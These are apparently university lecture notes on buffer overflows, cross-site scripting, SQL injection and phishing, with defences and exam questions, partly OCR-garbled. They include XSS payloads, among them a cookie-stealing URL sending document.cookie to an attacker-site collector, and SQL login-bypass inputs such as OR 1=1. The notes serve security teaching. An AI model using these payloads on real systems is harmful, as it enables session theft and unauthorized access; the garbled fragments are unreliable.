lOMoARcPSD|32189809

Buffer Over Flow (BOF)

• The BOF vulnerability is one of the oldest and, by far, the most common of software
vulnerabilities.
• As early as 1988, the Morris worm was one of the first to exploit this vulnerability.
• Since then, many creative ways of converting such a vulnerability into an exploit
have been devised.
• A buffer overflow (BOF) occurs when the space allocated to a variable (typically
an array or string variable) is insufficient to accommodate the variable in its
entirety.
• For example, a certain amount of buffer space is allocated for an array. If array
bounds are not checked while populating it, the array may overflow into
contiguous memory and corrupt it.
• Interestingly, this could cause an attacker to subvert the normal flow of a program.
Malicious code supplied by the attacker in the buffer could be executed.

1
 lOMoARcPSD|32189809

• A buffer (or array or string) is a space in which data can be held. A buffer resides in
memory. Because memory is finite, a buffer's capacity is finite. For this reason, in
many programming languages the programmer must declare the buffer's maximum
size so that the compiler can set aside that amount of space.
• In information security and programming, a buffer overflow, or buffer overrun, is
an anomaly where a program, while writing data to a buffer, overruns the buffer's
boundary and overwrites adjacent memory locations. ... Exploiting the behavior of a
buffer overflow is a well-known security exploit.
• Let us look at an example to see how buffer overflows can happen.
• Suppose a C language program contains the
declaration: char sample [10];
• The compiler sets aside 10 bytes to store this buffer, one byte for each of the 10
elements of the array, sample [0] through sample [9]. Now we execute the
statement:
sample [10] = 'B9;
• The subscript is out of bounds (that is, it does not fall between 0 and 9),
• so, we have a problem. The nicest outcome (from a security perspective)
• is for the compiler to detect the problem and mark the error
• during compilation. However, if the statement were
sample[i] = 'B';
• Let us examine this problem more closely. It is important to recognize that the
potential overflow causes a serious problem only in some instances.
• The problem's occurrence depends on what is adjacent to the array sample. For
example, suppose each of the ten elements of the array sample is filled with the
letter A and the erroneous reference uses the letter B, as follows:
for (i=O; i<=9; i++)
sample[i] = 'A9;
sample[1O] = 'B'

2
 lOMoARcPSD|32189809

Mgure 3-1. fflaces Where a Buffer Can Overflow.

Memory A AQ A) A) A A | A) A) A) A|B

Memory

(b) ARec6usñacode

Memory A AQ A| A A) A |A| A A) AQ B

Memory

(d) Sheets system cock

• If the extra character overflows into the user's data space, it simply overwrites an
existing variable value (or it may be written into an as-yet unused location),
perhaps affecting the program's result, but affecting no other program or data.
• In the second case, the 'B' goes into the user's program area. If it overlays an
already executed instruction, the user should perceive no effect. If it overlays
an instruction that is not yet executed, the machine will try to execute an
instruction with operation code 0x42, the internal code for the character 'B9.
• If there is no instruction with operation code 0x42, the system will halt on an
illegal instruction exception. Otherwise, the machine will use subsequent bytes
as if they were the rest of the instruction, with success or failure depending on the
meaning of the contents. Again, only the user is likely to experience an effect.
Why is buffer overflow A vulnerability?
• Key Concepts of Buffer Overflow. This error occurs when there is more data in a
buffer than it can handle, causing data to overflow into adjacent storage. This
vulnerability can cause a system crash or, worse, create an entry point for a
cyberattack. C and C++ are more susceptible to buffer overflow.

3
 lOMoARcPSD|32189809

Why buffer overflow is a problem?

• A buffer overflow can occur inadvertently, but it can also be caused by a
malicious actor sending carefully crafted input to a program that then attempts to
store the input in a buffer that isn't large enough for that input. If the excess data is
written to the adjacent buffer, it overwrites any data held there
Impact Buffer Overflow Vulnerability:
• Unstable Program Behavior
• System crash
• Memory access errors
• Code over-riding
• Security exploitation threat
• Un-authorized data access
• Excursive privilege actions
• Data theft and Data loss
Types of Buffer Overflow Vulnerabilities:
• Generally there are two types of Buffer vulnerabilities coined depending on specific
feature categorization and structure of memory overflow.
▫ Stack Overflow Vulnerabilities
▫ Heap Overflow Vulnerabilities

Stack Overflow Vulnerabilities

• The stack resides in process memory of our system with a fixed storage capacity and
has a Last-In-First-Out data structure. It manages all the memory allocating and
memory free-up functions without manual intervention. When the memory input
exceeds the limit of stack an overflow occurs resulting in data exploit. A stack
overflow can occur in following cases:
 Outbound declaration of variables
 Infinite recursion
What does stack overflow
mean?
• A stack overflow is an undesirable condition in which a particular computer
program tries to use more memory space than the call stack has available. In
programming, the call stack is a buffer that stores requests that need to be
handled It is usually
defined at the start of a program.

4
 lOMoARcPSD|32189809

What is stack overflow attack?

• In software, a stack buffer overflow or stack buffer overrun occurs when a
program writes to a memory address on the program's call stack outside of the
intended data structure, which is usually a fixed-length buffer Stack buffer
overflow can be caused
deliberately as part of an attack known as stack smashing.
Stack Basics
• A stack is contiguous block of memory containing data.
• Stack pointer (SP) – a register that points to the top of the stack.
• The bottom of the stack is at fixed address.
• Its size is dynamically adjusted by kernel at run time.
• CPU implements instructions to PUSH onto and POP off the stack.

Lower memory addresses

High memory addresses

• A stack consists of logical stack frames that are pushed when calling a function and
popped when returning. Frame pointer (FP) – points to a fixed location within a
frame.
• When a function is called, the return address, stack frame pointer and the variables
are pushed on the stack (in that order).
• So the return address has a higher address as the buffer.
• When we overflow the buffer, the return address will be
overwritten. void function()
{
&
return;
}
void main()
{
..
Function();

5
 lOMoARcPSD|32189809

..
}

6
 lOMoARcPSD|32189809

Example Code
void function(int a, int b, int c)
{ char buffer1[5];
char buffer2[10];
}
void main(){
function(1,2,3);
}

bottom of memory top of

memory buffer2 buffer1 sfp
ret a b c
<------ [ ][ ] [ ][ ][ ][ ][ ]
Top of stack bottom of stack

Exploiting Stack Overflows:

• Provide input to a buffer on the stack which includes malicious code (often called
shellcode)
• Overflow the buffer so that the return address to the calling program is overwritten
with the address of the malicious code
• That way, when the called function terminates, it will not return to the calling
program. Instead, the malicious code will be executed

7
 lOMoARcPSD|32189809

Oxbtffffbenv. vars Oxbtfftfb

pzrametefs pzrameten nturn addr

feturn addr prev. flam pfav. fame
g stack van
stachva:s
frame 0 expBct0d Iccztan of th return addr
stac kbfier q fosvth qroivth

retu rn acldr

Ok eat-- - - ” ' - ”' ”' ' -

" add r c '. thy

void main (}
( char
(iii) executing the attack code
buffer{9e•]:
strcpy(buffer, &rqe_stri
nq}; return;

8
 lOMoARcPSD|32189809

General Form of Security Attack Achieves Two Goals:

1. Inject the attack code, which is typically a small sequence of instructions that
spawns a shell, into a running process.
2. Change the execution path of the running process to execute the attack code.
How can we place arbitrary instruction into its address space?
place the code that you are trying to execute in the buffer we are overflowing, and overwrite
the return address so it points back into the buffer.
Impact:
• Denial of Service
• Memory leakages
Protection from Stack overflows:
• Using non executable stack which does not hold any code
• Using the robust programming languages where the memory access functions can9t be
triggered easily
• Use compilers which prevent overflows
• Always check and validate the inputs received

Cross Site Scripting (XSS)

• Cross-Site Scripting (referred to as XSS) is a type of web application attack
where malicious client-side script is injected into the application output and
subsequently executed by the user9s browser
• XSS is a vulnerability which when present in websites or web applications, allows
malicious users (Hackers) to insert their client-side code (normally JavaScript) in
those web pages. When this malicious code along with the original webpage gets
displayed in the web client (browsers like IE, Mozilla etc), allows Hackers to gain
greater access of that page.
• It can be used to take over a user9s browser in a variety of ways
 Cross Site Scripting (XSS) is a type of computer security exploit where information
from one context, where it is not trusted, can be inserted into another context,
where it is
 The trusted website is used to store, transport, or deliver malicious content to
the victim
 The target is to trick the client browser to execute malicious scripting commands
 JavaScript, VBScript, ActiveX, HTML, or Flash
 Caused by insufficient input validation.

9
 lOMoARcPSD|32189809

Cross Site Scripting Risks

XSS can :
 Steal cookies
 Hijack of user9s session
 Unauthorized access
 Modify content of the web page
 Inserting words or images
 Misinform
 Bad reputation
 Spy on what you do
 Network Mapping
 XSS viruses
 stealing other user9s cookies
 stealing their private information
 performing actions on behalf of other users
 redirecting to other websites
 Showing ads in hidden IFRAMES and popups

10
 lOMoARcPSD|32189809

Cross Site Scripting Types

Three known types:
 Reflected (Non-Persistent)
 Link in other website or email
 Stored (Persistent)
 Forum, bulletin board, feedback form
 DOM Based XSS(Local)
 PDF Adobe Reader, FLASH player
1) Reflected (Non-Persistent)
• Reflected cross-site scripting vulnerabilities arise when data is copied
from a request and echoed into the application's immediate response in
an unsafe way.
• An attacker can use the vulnerability to construct a request which, if issued by
another application user, will cause JavaScript code supplied by the attacker to
execute within the user's browser in the context of that user's session
with the application.
• The attacker-supplied code can perform a wide variety of actions, such as stealing
the victim's session token or login credentials, performing arbitrary actions on
the victim's behalf, and logging their keystrokes.

• Malicious content does not get stored in the server

• The server bounces the original input to the victim without modification
• Exploits the fact that some servers echo back certain user input back to the
client without validating it
• For example, a user may be asked for personal details in an HTML form. Suppose he
enters his name as <Prashant=. The server then responds with <Hello Prashant=

11
 lOMoARcPSD|32189809

• Note that the server has echoed back his name

• Now, what would happen if, instead of Prashant, the user enters
<SCRIPT>alert(8Fire!9)</SCRIPT>
Reflected XSS Example
• Exploit URL:
http://www.nikebiz.com/search/?q=<script>alert('XSS') </script>&x=0&y=0
• HTML returned to victim:
<div id="pageTitleTxt">
<h2><span class="highlight">Search Results</span><br /> Search: "<script>alert('XSS')
</script>"</h2>
2) Stored XSS
• JavaScript supplied by the attacker is stored by the website (e.g. in a database)
• Doesn9t require the victim to supply the JavaScript somehow, just visit the
exploited web page
• More dangerous than Reflected XSS
▫ Has resulted in many XSS worms on high profile sites like MySpace and Twitter

• The server stores the malicious content

• The server serves the malicious content in its original form
• The malicious code (scripts) on a web page is saved on the web server.
• When an innocent user downloads the web page, the malicious scripts execute on that
user9s browser.
• Example: Users update their profile on a social networking site. These profiles may
be read (downloaded) by other users through their browsers

12
 lOMoARcPSD|32189809

3) DOM Based XSS (Local)

• DOM Based XSS (or as it is called in some texts, <type-0 XSS=) is an XSS attack
wherein the attack payload is executed as a result of modifying the DOM
<environment= in the victim's browser used by the original client-side script, so
that the client-side code runs in an <unexpected= manner.
• Occur in the content processing stages performed by the client

<select>
<script>document.write("<OPTION value=1>< +document.location.href.substring
(document.location.href.indexOf ("default=")+8)+"</OPTION>");
</script></select>
http://www.some.site/page.html?default=ASP.NET /page.html?default=
<script>alert(document.cookie)</script>

Examples of XSS in code

• This script is named welcome.cgi, and its parameter is <name=. It can be operated this
way:
GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0
Host: www.vulnerable.site
...
And the response would be:
<HTML>
<Title>Welcome!</Title>
Hi Joe Hacker
<BR>
Welcome to our system
...
</HTML>

13
 lOMoARcPSD|32189809

Examples of XSS in code

• Such a link looks like:
http://www.vulnerable.site/welcome.cgi?name=<script>
alert(document.cookie)</script>
The victim, upon clicking the link, will generate a request to www.vulnerable.site, as follows:
GET/welcome.cgi?name=<script>alert(document.cookie)
</script> HTTP/1.0
Host: www.vulnerable.site
And the vulnerable site response would be:
<HTML>
<Title>Welcome!</Title>
Hi <script>alert(document.cookie)</script>
<BR>
Welcome to our system
</HTML>

Examples of XSS in code

• The malicious link would be:
http://www.vulnerable.site/welcome.cgi?name=<script>window.open
(<http://www.attacker.site/collect.cgi?cookie==%2Bdocument.cookie)</script>
And the response page would look like:
<HTML>
<Title>Welcome!</Title>
Hi
<script>window.open(<http://www.attacker.site/collect.cgi?cookie==+document.cookie)</sc
ript>
<BR>
Welcome to our system
...
</HTML>

14
 lOMoARcPSD|32189809

Example: XSS Worms

• Samy Worm
• Affected MySpace
• Leveraged Stored XSS vulnerability so that for every visitor to Samy9s MySpace page,
the following would silently happen:
▫ The visitor would be added as Sammy9s friend
▫ The visitor would get an update to their page that infected it with the
same JavaScript and left a message saying, <but most of all, Samy is my
hero=.
• Worm spread exponentially
• Over 1 million friend requests in less than 20 hours
Overcoming XSS
• Validate and filter all user input. (Should this be done at the client or server?)
• One strategy is to make a blacklist of all user input that should be filtered out. For
example, single/double quotes, angular brackets, etc. should not appear in an e-mail
address input from the user.
• A better solution in most cases is the equivalent of a whitelist approach - specify
precisely what user input is expected. This is often accomplished by the use of a
regular expression.
XSS Vulnerabilities:
Improper Handling of User-Supplied Data
• >= 80% of web security issues caused by this!
• NEVER Trust User/Client Input!
▫ Client-side checks/controls have to be invoked on the server too.
• Improper Input Validation
• Improper Output Validation
Validate Input
▫ Letters in a number field?
▫ 10 digits for 4 digit year field?
▫ Often only need alphanumeric
▫ Careful with < > " ' and =
▫ Whitelist (e.g. /[a-zA-Z0-9]{0,20}/)
▫ Reject, don9t try and sanitize

15
 lOMoARcPSD|32189809

Validate Output
▫ Encode HTML Output

16
 lOMoARcPSD|32189809

• If data came from user input, a database, or a file

• Response.Write(HttpUtility.HtmlEncode(Request.Form ["name"]));
• Not 100% effective but prevents most vulnerabilities
▫ Encode URL Output
• If returning URL strings
• Response.Write(HttpUtility.UrlEncode(urlString));
RULE #O - Never Insert Untrusted Data Except in Allowed Locations
<script>...NEVER PUT UNTRUSTED DATA HERE...</script> directly in a script
<!--...NEVER PUT UNTRUSTED DATA HERE...--> inside an HTML comment
<div ...NEVER PUT UNTRUSTED DATA HERE...=test /> in an attribute name
<...NEVER PUT UNTRUSTED DATA HERE... href="/test" /> in a tag name

RULE #1 - HTML Escape Before Inserting Untrusted Data into HTML Element Content
<body>...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE&</body>
<div>&ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE&</div>
any other normal HTML elements
• Escape these characters:
▫ & --> &amp;
▫ < --> &lt;
▫ > --> &gt;
▫ " --> &quot;
▫ ' --> &#x27; &apos; is not recommended
▫ / --> &#x2F;
 forward slash is included as it helps end an HTML entity
RULE #2 - Attribute Escape Before Inserting Untrusted Data into HTML Common
Attributes
<div attr=&ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE&>content</div>
inside UNquoted attribute
<div attr='&ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE&'>content</div>
inside single quoted attribute
<div attr="&ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE&">content</div>
inside double quoted attribute
Except for alphanumeric characters, escape all characters with ASCII values less than
256 with the &#xHH; format or named entity if available. Examples: &quot; &#39;

17
 lOMoARcPSD|32189809

RULE #3 - JavaScript Escape Before Inserting Untrusted Data into HTML JavaScript
Data Values
The only safe place to put untrusted data into these event handlers as a quoted "data
value.<
<script>alert('...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...')</script> inside a
quoted string
<script>x='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'</script> one side of a
quoted expression
<div onmouseover="x='...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...'"</div>
inside quoted event handler
Except for alphanumeric characters, escape all characters less than 256 with the \xHH
format. Example: \x22 not \=
<script> window.setInterval('...EVEN IF YOU ESCAPE UNTRUSTED DATA YOU ARE XSSED
HERE...'); </script>
RULE #4 - CSS Escape Before Inserting Untrusted Data into HTML Style Property
Values
<style>selector { property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...; }
</style> property value
<span style=property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING
HERE...;>text</style> property value
Except for alphanumeric characters, escape all characters with ASCII values less than
256 with the \HH escaping format. Example: \22 not \=
RULE #5 - URL Escape Before Inserting Untrusted Data into HTML URL Parameter
Values
<a href="http://www.somesite.com?test=...URL ESCAPE UNTRUSTED DATA BEFORE
PUTTING HERE...">link</a >
Except for alphanumeric characters, escape all characters with ASCII values less than
256 with the %HH escaping format. Example: %22
Remember HttpUtility.UrlEncode()
Reduce Impact of XSS Vulnerabilities
• If Cookies Are Used:
▫ Scope as strict as possible
▫ Set 8secure9 flag
▫ Set 8HttpOnly9 flag
▫ On the client, consider disabling JavaScript (if possible) or use something
like the No Script Firefox extension.

18
 lOMoARcPSD|32189809

SQL Injection
• SQL injection is a code injection technique that might destroy your database.
• SQL injection is one of the most common web hacking techniques.
• SQL injection is the placement of malicious code in SQL statements, via web page input.
1. App sends form to user.
2. Attacker submits form with SQL exploit data.
3. Application builds string with exploit data.
4. Application sends SQL query to DB.
5. DB executes query, including exploit, sends data back to application.
6. Application returns data to user.

Firewall

Web Server DB Server

SQL Injection – Example1

Login Form
<html> <form action=8index.php9 method="post">
<input type="email" name="email" required="required"/>
<input type="password" name="password"/>
<input type="submit" value=<Login"/>
</form></html>
The above form accepts the email address, and password then submits them to a PHP file
named index.php.

19
 lOMoARcPSD|32189809

Create DB
CREATE TABLE `users` (`id` INT NOT NULL AUTO_INCREMENT, `email` VARCHAR (45)
NULL,
`password` VARCHAR (45) NULL, PRIMARY KEY (`id`));
insert into users (email, password) values ('[email protected], (81234'));

ID EMAIL PASSWORD

1 [email protected] 1234

web page input

• Let9s suppose the statement at the backend (PHP & MySQL) for checking user ID is as
follows
SELECT * FROM users WHERE email = $_POST['email'] AND password =
md5($_POST['password']);
• The above statement uses the values of the $_POST[] array directly without
sanitizing them. The password is encrypted using MD5 algorithm.
• These values has to be checked in the DB.
• Original code is
SELECT * FROM users WHERE email = [email protected] AND password = md5(1234);
• The out put is:

20
 lOMoARcPSD|32189809

SQL Injection Vulnerabilities

Let9s suppose an attacker provides the following input
• Step 1: Enter [email protected] as the email address
• Step 2: Enter xxx') OR 1 = 1 -- ] as the password

Injected SQL code:

SELECT * FROM users WHERE email = '[email protected]' AND password = md5('xxx') OR
1 = 1 -- ]');
• The diagram below illustrates the statement has been generated.

21
 lOMoARcPSD|32189809

Example 2:
Let9s suppose an attacker provides the following input
• Step 1: Enter [email protected]' OR 1 = 1 LIMIT 1 -- 8 ] as the email Step 2: Enter
1234 as the password
• The Injected SQL code:
SELECT * FROM users WHERE email = '[email protected]' OR 1 = 1 LIMIT 1 -- ' ] AND
password = md5(81234');
• [email protected] ends with a single quote which completes the string quote
• OR 1 = 1 LIMIT 1 is a condition that will always be true and limits the returned
results to only one record.
• -- ' AND & is a SQL comment that eliminates the password part.

Example 3
SQL Injection Based on ""="" is Always True
• Here is an example of a user login on a web site:

22
 lOMoARcPSD|32189809

uName = getRequestString("username");
uPass = getRequestString("password");

sql = 'SELECT * FROM Users WHERE Name ="' + uName + '" AND Pass ="' + uPass + 8<9

Original SQL code:

SELECT * FROM Users WHERE Name ="John Doe" AND Pass ="myPass"
• A hacker might get access to user names and passwords in a database by
simply inserting " OR ""=" into the user name or password text box:

Injected SQL code:

SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""="<
The SQL above is valid and will return all rows from the "Users" table, since OR ""="" is always
TRUE.

SQL Injection after effect

• Bypass login page
• DOS - Deny of service
• Install web shell
• Iframe injection
• Access system files
• Install db backdoor
• Theft of sensitive information / credit cards
• Additional step of the attack:
▫ Attack computers on the LAN

23
 lOMoARcPSD|32189809

Phishing
• Phishing is the fraudulent attempt to obtain sensitive information such as
usernames, passwords and credit card details by disguising as a trustworthy
entity in an electronic communication.
• Phishing is a type of social engineering attack often used to steal user data,
including login credentials and credit card numbers. It occurs when an attacker,
masquerading as a trusted entity, dupes a victim into opening an email, instant
message, or text message.
Detect a Phishing Scam
• Spelling errors (e.g., <pessward=), lack of punctuation or poor grammar
• Hyperlinked URL differs from the one displayed, or it is hidden
• Threatening language that calls for immediate action
• Requests for personal information
• Announcement indicating you won a prize or lottery
• Requests for donations
• Phishing – Cybercriminal attempts to steal personal and financial information or
infect computers and other devices with malware and viruses
• Designed to trick you into clicking a link or providing personal or financial
information
• Often in the form of emails and websites
• May appear to come from legitimate companies, organizations or known
individuals
• Take advantage of natural disasters, epidemics, health scares, political
elections or timely events
• eBay and PayPal are two of the most targeted companies, and online banks are
also common targets.
• Phishing is typically carried out by email or instant messaging, and often
directs users to give details at a website, although phone contact has been
used as well.
• E-mails supposedly from the Internal Revenue Service have also been used.
• Social Networking sites are also a target of phishing, since the personal details in
such sites can be used in identity theft.
• Experiments show a success rate of over 7O% for phishing attacks on social
networks

24
 lOMoARcPSD|32189809

Types of Phishing
• Mass Phishing (Deceptive Phishing) – Mass, large-volume attack intended to
reach as many people as possible
• Spear Phishing – Targeted attack directed at specific individuals or companies
using gathered information to personalize the message and make the scam more
difficult to detect
• Whaling (CEO Fraud) – Type of spear phishing attack that targets <big fish,= including
high-profile individuals or those with a great deal of authority or access
• Clone Phishing(pharming) – Spoofed copy of a legitimate and previously
delivered email, with original attachments or hyperlinks replaced with malicious
versions, which is sent from a forged email address. so it appears to come from
the original sender or another legitimate source
• Advance-Fee Scam- Requests the target to send money or bank account
information to the cybercriminal
Phishing – Link Manipulation
• Most methods of phishing use some form of technical deception designed to
make a link in an email (and the spoofed website it leads to) appear to belong to
the spoofed organization.
• Misspelled URLs (Uniform resource locator ) or the use of subdomains
are common tricks used by phishers, such as this example URL,
http://www.Suntrust.com.bank.com/.
• Another common trick is to make the anchor text for a link appear to be a valid
URL when the link actually goes to the phishers' site.
Phishing Lure
 Claims to come from the NDSU IT Help Desk and system administrators
• References NDSU and North Dakota State University
• Calls for immediate action using threatening language
• Includes hyperlink that points to fraudulent site

25
 lOMoARcPSD|32189809

Claims to come from the NDSU Human Resources

• Timely call for action during annual review season
• From address includes NDSU, but not .edu address (@ndsu.com)
• Includes hyperlink that points to fraudulent site

 Claims to come from PayPal

• Includes PayPal logo, but from address is not legitimate (@ecomm360.net)
• Calls for immediate action using threatening language
• Includes hyperlink that points to fraudulent site

26
 lOMoARcPSD|32189809

Protect Yourself: Refuse the Bait

• Do not click on any hyperlinks in the email
▫ User your computer mouse to hover over each link to verify its
actual destination, even if the message appears to be from a
trusted source
▫ Pay attention to the URL and look for a variation in spelling or different
domain (e.g., ndsu.edu vs. ndsu.com)
▫ Consider navigating to familiar sites on your own instead of using links
within messages
• Examine websites closely
▫ Malicious websites may look identical to legitimate sites
▫ Look for <https://= or a lock icon in the address bar before entering any
sensitive information on a website
• Users can take steps to avoid phishing attempts by slightly modifying their
browsing habits.
• Users who are contacted about an account needing to be "verified" (or any other
topic used by phishers) can contact the company that is the subject of the email to
check that the email is legitimate, They can also type in a trusted web address
for the company's website into the address bar of their browser to bypass the link
in the suspected phishing message.
• Nearly all legitimate email messages from companies to their customers will
contain an item of information that is not readily available to phishers.
• Some companies, like PayPal, always address their customers by their username in
emails, so if an email addresses a user in a generic fashion ("Dear PayPal customer")
it is likely to be an attempt at phishing.
• SPAM filters can also help by reducing the number of phishing emails that
users receive in their inboxes.

27
 lOMoARcPSD|32189809

Model Questions
1. What is vulnerability? Give the different types of vulnerabilities.
2. What is software vulnerability? What are the common types of software flaws that
lead to vulnerability?
3. Why is buffer overflow a vulnerability?
4. How do buffer overflow attacks work?
5. With an example explain the concept of buffer overflow. Discuss how the
buffer overflow has security implications.
6. What do you understand by a stack and a buffer overflow? How are these
two different? What are the practices of writing a safe program code?
7. Describe how a stack buffer overflow attack is implemented.
8. What are the impacts in buffer overflow vulnerability?
9. Explain in detail about exploiting stack overflows with example.
10. How to protect stack overflow attack?
11. What is XSS or Cross Site Scripting?
12. What information can an attacker steal using XSS?
13. What are the types of XSS?
14. What is stored XSS?
15. What is reflected XSS?
16. What is DOM- based XSS?
17. What is cross site scripting? How can it be prevented?
18. Why is cross site scripting dangerous?
19. How often do you find DOM-based XSS vulnerabilities?
20.What is <SQL injection=?
21. How can you detect SQL injection? What is the most common SQL injection tool?
22. What is injection attack?
23. What is code injection attack?
24. How can SQL injection be prevented?
25. How do we prevent SQL injection in our applications?
26. Explain what is phishing? How can it be prevented?
27. What is the difference between spam and phishing?
28.How do I avoid becoming a victim of a phishing scam?
29. What are the different types of phishing?
30.What are some examples of phishing?
31. What is a phishing attempt?
32. What are three characteristics of a phishing email?

28